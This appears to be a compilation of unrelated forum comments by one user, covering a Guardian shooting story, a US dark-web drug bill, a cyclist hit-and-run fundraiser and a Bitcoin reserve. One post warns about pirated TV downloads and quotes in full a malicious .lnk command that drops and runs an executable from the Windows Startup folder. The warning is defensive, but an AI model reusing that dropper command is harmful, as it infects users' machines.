As I get older, I realized I'm just not in that much of a hurry anymore. And I really, really don't want to hit a kid, so I'll drive slow thru towns.

Freeway though, that's 80 mph.

Who is Jerma, and why does his crap clog my YouTube feed? Except it's not Jerma's stuff, but people making videos about Jerma.

“Raising a rifle” has a single fairly unambiguous meaning to most people I know;

Yep, it sure does. But this is a poorly written article from The Guardian. I'm not sure Brits know what an AR-15 is.

If we assume that what’s in the story is accurate, then yes, to me there is.

Don't assume anything. It makes you an ass.

why did you speculate that he may have been a leftist?

Because it's speculation. I see nothing in this one, poorly-written story that says anything other than some armed people in vests shot someone else carrying a rifle, and killed a bystander in the process. I'm almost certain the guy with the rifle didn't shoot anybody, but that's just...ahem...speculation.

It's not a pyramid, it's an inverted Delta. And that puts you right at the top.

It's getting downvoted because it's not realistic.

I really can't tell what "raised" means in this context. It doesn't say anywhere that he pointed his rifle at anyone. There isn't enough information in this story to infer intent. And I definitely can't deduce the political leaning of someone barely mentioned in a news story, regardless of your feelings on Gaza and the economy.

  1. He had a rifle.
  2. He was shot by unnamed people.
  3. The unnamed people also killed a bystander.

He probably can't sleep anyway.

I saw another post here with pictures of this guy carrying his rifle at other protests. He may have just be a leftist 2nd amendment enthusiast.

Don't interact with yogthos. I blocked him almost immediately after joining Lemmy. they're not interested in dialogue.

Dark Web Interdiction Act of 2025

Here is the text of a bill introduced to Congress (US), ostensibly to combat the trafficking of opioids over "The Dark Web". There's a nice definition of "The Dark Web" at section 4.

I like the part where it says people are using "The Dark Web" both within the United States and "at the international border".

Do these people in Congress actually think like this? Or are they aware they're just being performative?

Not later than 90 days after the date of the enactment of this Act, the head of each agency shall require any special Government employee in a sensitive position at the agency on the date of the enactment of this Act to be entered into a random drug testing program in accordance with the Mandatory Guidelines for Federal Workplace Drug Testing Programs.

“I get it that it makes people feel good to see people yelling,” Slotkin said. “But not one of those words is stopping the actual things that Donald Trump is doing.”

Perhaps it's not working because of people like Slotkin willing to continue the losing strategies of the past.

TJ Day liked riding his bike to and from work at Walgreens. It helped him stay fit and gave him time to wind down in the evening.

He wore a reflective vest, helmet and added lights to the front and back of his bike for safety. He did everything right, said his sister Kelli Day.

Still, TJ was hit by a car on his way home from work on Feb. 18.

Another driver who found him in a snowbank on Lovers Lane near Stryker Way after the hit-and-run. That driver stayed in contact, and later offered to buy TJ a new bike. But in the meantime, supporters of TJ had already raised more than $20,000 to buy him a car.

As of Thursday, March 6, a GoFundMe Kelli organized has raised $23,427, with a goal of $28,000.

TJ has always been apprehensive about driving, but now he’s more nervous of biking, Kelli said. The generosity of his community will help him get a safe and reliable car.

I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!

I can't think of any. The current oil reserve is supposed to be used in the case of another oil embargo. But its actual use is to lower gas prices when the administration in power needs a political win.

I actually think the purpose of a Bitcoin reserve is to temporarily increase the price so tech-bros (re: Elon) can sell at a massive profit. Then buy back at a much lower price. It's just a way to indirectly transfer federal dollars into administration pockets.

I can't find any reason for the government to buy crypto and hold it in reserve.
